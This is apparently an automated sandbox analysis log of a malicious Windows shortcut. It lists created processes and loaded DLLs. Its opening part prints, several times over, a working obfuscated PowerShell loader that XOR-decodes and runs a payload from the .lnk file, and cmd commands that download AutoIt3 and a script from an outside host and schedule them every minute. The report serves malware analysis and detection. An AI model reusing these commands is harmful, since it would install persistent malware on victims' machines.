c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
